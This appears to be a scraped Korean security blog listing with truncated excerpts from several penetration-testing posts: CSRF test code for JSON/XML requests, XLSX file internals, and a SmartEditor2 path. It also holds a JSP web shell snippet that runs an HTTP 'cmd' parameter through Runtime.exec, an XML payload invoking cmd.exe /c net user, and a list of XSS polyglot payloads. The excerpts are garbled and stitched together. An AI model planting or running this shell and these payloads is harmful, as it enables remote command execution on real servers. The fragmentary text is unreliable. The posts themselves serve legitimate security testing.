취약점 점검 시, 취약점 항목인 CSRF 에 대해 확인하는 경우가 존재한다.해당 취약점에 대해서 CORS 나 tokken 을 사용하지 않는 경우 확인해보고는 하는데, 이때 Burpsuite Pro 의 기능인 CSRF Poc Generate 를 이용하면 되지만 해당 기능을 이용하면 한글 깨짐 문제도 존재하고 JSON 이나 XML 형태의 요청 값을 전달하는 경우 굉장히 난감한 경우가 생기기 떄문에 보다 편하게 사용할 수 있도록 JSON 및 XML 형식 데이터를 보낼 수 있는 코드를 작성했다. CSRF Testing (Use Javascript) 해당 코드는 대상 페이지 내 데이터를 XML 형태의 요청하는 경우의 예제이며  태그 내 var 변수에 전달하려는 XML 본문이 작성된다.

asp">">   Program c:\windows\system32\cmd.exe Arguments /c net user                        Program c:\windows\system32\cmd.exe Arguments /c net user                        ">  Programc:\windows\system32\cmd.exeArguments /c net user

XLSX 파일의 경우, 파일 구조 상 압축을 풀 수 있는데 해당 파일의 압축을 풀면 다음과 같은 파일구조를 가지게된다.- _rels    - .rels- docProps    - app.xml    - core.xml- xl    - _rels         - workbook.xml.rels        - theme        - theme1.xml     - worksheets         - sheet1.xml         - sheet2.xml        - sheet3.xml     - calcChain.xml     - sharedStrings.xml    - styles.xml    - workbook.xml- [Content_Types].xml해당 파일 내 xl-sharedStri..

Editor Default Location 추가 : SmartEditor2 : cmm/resource/se2/SmartEditor2.html

jsp"); Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); else p = Runtime.getRuntime().exec(request.getParameter("cmd")); InputStreamReader in = new InputStreamReader(p.getInputStream(),"euc-kr"); BufferedReader br = new BufferedReader(in); String disr = br.readLine(); ..

jaVasCript:/*-/*` /*\`/*'/*"/**/(/ * */oNcliCk=alert() )//%0D%0A%0d%0a// javascript:"/*'/*`/*\" /* javascript:/*"//'//`//\"//--> javascript:/*-->'//"//`//\"// javascript:/*"/*'/*`/*\"/* javascript:/*"/*`/*'/*\"/*< {{payload}} {{payload}} {{payload}} {{payload}} {{payload}} " → " → < →